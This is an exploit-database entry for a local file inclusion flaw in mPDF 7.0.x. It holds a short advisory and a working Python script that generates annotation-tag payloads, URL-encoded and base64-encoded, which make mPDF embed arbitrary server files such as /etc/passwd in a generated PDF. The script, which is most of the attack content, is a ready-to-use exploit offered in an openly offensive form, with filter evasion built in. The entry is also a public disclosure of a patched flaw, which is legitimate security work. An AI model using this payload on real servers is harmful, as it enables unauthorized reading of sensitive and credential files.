mPDF 7.0 - Local File Inclusion

vendor:

mPDF

by:

Musyoka Ian

7.5

CVSS

HIGH

Local File Inclusion

CWE

Product Name: mPDF

Affected Version From: mPDF 7.0.x

Affected Version To: mPDF 7.0.x

Patch Exists: YES

Related CWE:

CPE: a:mpdf:mpdf:7.0.x

Metasploit:

Other Scripts:

Platforms Tested: Ubuntu 20.04

2022

mPDF 7.0 – Local File Inclusion

mPDF is vulnerable to Local File Inclusion (LFI) vulnerability. An attacker can exploit this vulnerability to read sensitive files from the server. The attacker can craft a malicious payload and send it to the vulnerable server. The payload contains the file name which the attacker wants to read from the server. The attacker can also use the base64 encoded payload to bypass the security filters. The attacker can also use the URL encoded payload to bypass the security filters.

Mitigation:

The user should always use the latest version of mPDF and should not use the vulnerable version. The user should also use the security filters to prevent the malicious payloads from reaching the server.

Source

Exploit-DB raw data:

# Exploit Title: mPDF 7.0 - Local File Inclusion
# Google Dork: N/A
# Date: 2022-07-23
# Exploit Author: Musyoka Ian
# Vendor Homepage: https://mpdf.github.io/
# Software Link: https://mpdf.github.io/
# Version: CuteNews
# Tested on: Ubuntu 20.04, mPDF 7.0.x
# CVE: N/A

#!/usr/bin/env python3

from urllib.parse import quote
from cmd import Cmd
from base64 import b64encode

class Terminal(Cmd):
    prompt = "\nFile >> "
    def default(self, args):
        payload_gen(args)
def banner():
    banner = """                          _____  _____  ______   ______ ___  __   __                  _       _ _   
                         |  __ \|  __ \|  ____| |____  / _ \ \ \ / /                 | |     (_) |  
               _ __ ___  | |__) | |  | | |__        / / | | | \ V /    _____  ___ __ | | ___  _| |_ 
               | '_ ` _ \|  ___/| |  | |  __|      / /| | | |  > <    / _ \ \/ / '_ \| |/ _ \| | __|
               | | | | | | |    | |__| | |        / / | |_| | / . \  |  __/>  <| |_) | | (_) | | |_ 
               |_| |_| |_|_|    |_____/|_|       /_/ (_)___(_)_/ \_\  \___/_/\_\ .__/|_|\___/|_|\__|
                                                                               | |                  
                                                                               |_|   """
    print(banner)
def payload_gen(fname):
    payload = f'<annotation file="{fname}" content="{fname}" icon="Graph" title="Attached File: {fname}" pos-x="195" />'
    encoded_payload = quote(payload)
    print("[+] Replace the content with the payload below")

    print(f"Url encoded payload:\n{encoded_payload}\n")
    base64enc = b64encode(encoded_payload.encode())
    print(f"Base64 encoded payload:\n{base64enc.decode()}\n")
if __name__ == ("__main__"):
    banner()
    print("Enter Filename eg. /etc/passwd")
    terminal= Terminal()
    terminal.cmdloop()